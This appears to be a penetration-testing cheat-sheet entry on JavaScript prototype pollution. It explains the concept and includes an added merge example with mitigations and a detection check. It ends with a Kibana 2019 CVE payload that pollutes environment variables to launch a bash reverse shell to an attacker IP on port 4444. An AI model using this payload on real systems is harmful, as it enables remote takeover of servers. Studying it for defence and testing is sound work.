killchain-compendium/Exploits/Web/Prototype Pollution JS.md

Prototype Pollution

  • Overwrite built-in properties of an object, such as constructor or toString.
  • Every other instance inherits from the shared prototype (reached through obj.__proto__, i.e. Object.prototype), so a property written there is visible on all objects; toString() is inherited by all objects for the same reason.

Usage

  • Access the prototype from inside an object, for example in JavaScript:
      obj.__proto__
      Object.prototype
  • Create an object:
      let obj = {}
  • Create properties inside __proto__ (they then appear on every object):
      obj.__proto__.isAdmin = true
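The lines above show the pollution by hand. The following is an added example, not code from the compendium, showing the usual way it happens in practice: a naive recursive merge of attacker-controlled JSON walks into the "__proto__" key and writes onto Object.prototype, so an unrelated object suddenly carries isAdmin. The hardened merge beside it refuses the three keys that reach the prototype chain, and a null-prototype target is shown as a second mitigation. The function names (naiveMerge, safeMerge, runDemo) and the JSON input are constructed for this illustration.

```javascript
// Added example (not from the compendium). Demonstrates prototype pollution
// through a recursive merge and two mitigations. Cleans up after itself so the
// process is not left with a polluted Object.prototype.

// Naive deep merge: copies every key of source into target, including
// "__proto__". For a plain-object target, target["__proto__"] is
// Object.prototype, so the recursion writes onto the shared prototype.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (target[key] === undefined) target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skips the keys that lead into the prototype chain and only
// recurses into own, object-valued properties of the target.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue; // never walk toward the prototype
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== 'object' || target[key] === null) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input, e.g. a JSON request body that a service merges
// into a settings object. JSON.parse keeps "__proto__" as an own property, so
// Object.keys() returns it and the merge sees it.
const POLLUTING_JSON = '{"theme":"dark","__proto__":{"isAdmin":true}}';

function runDemo() {
  const result = {};

  // 1. Naive merge into a plain object: Object.prototype gets polluted.
  try {
    naiveMerge({}, JSON.parse(POLLUTING_JSON));
    const victim = {}; // fresh, unrelated object created after the merge
    result.naiveVictimIsAdmin = victim.isAdmin === true; // true, inherited
    result.naiveIsOwnProperty =
      Object.prototype.hasOwnProperty.call(victim, 'isAdmin'); // false
  } finally {
    delete Object.prototype.isAdmin; // undo the pollution for this process
  }

  // 2. Hardened merge: the dangerous key is dropped, normal keys survive.
  const settings = safeMerge({}, JSON.parse(POLLUTING_JSON));
  result.safeTheme = settings.theme;                 // 'dark'
  result.safeVictimIsAdmin = ({}).isAdmin === true;  // false

  // 3. Null-prototype target: even the naive merge cannot reach
  //    Object.prototype, because target["__proto__"] has no getter and
  //    simply becomes an ordinary own property of the target.
  const isolated = naiveMerge(Object.create(null), JSON.parse(POLLUTING_JSON));
  result.nullProtoOwnKey =
    Object.prototype.hasOwnProperty.call(isolated, '__proto__'); // true
  result.nullProtoLeaked = ({}).isAdmin === true;               // false

  return result;
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The inherited-vs-own distinction in step 1 is the detection signal: a property that reads as true but fails hasOwnProperty on a freshly created object is a polluted prototype. For input validation, rejecting the three blocked keys (or using Object.create(null) / Map for untrusted key sets) is the standard mitigation.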

Start Node commands

  • Look for code reachable from the polluted property that ends up calling
    • require
    • eval

Kibana CVE 2019

  • Write a reverse shell into an environment variable through the polluted prototype, then set NODE_OPTIONS so a newly spawned Node process loads /proc/self/environ (which contains that variable) as a script:
      .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
      .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')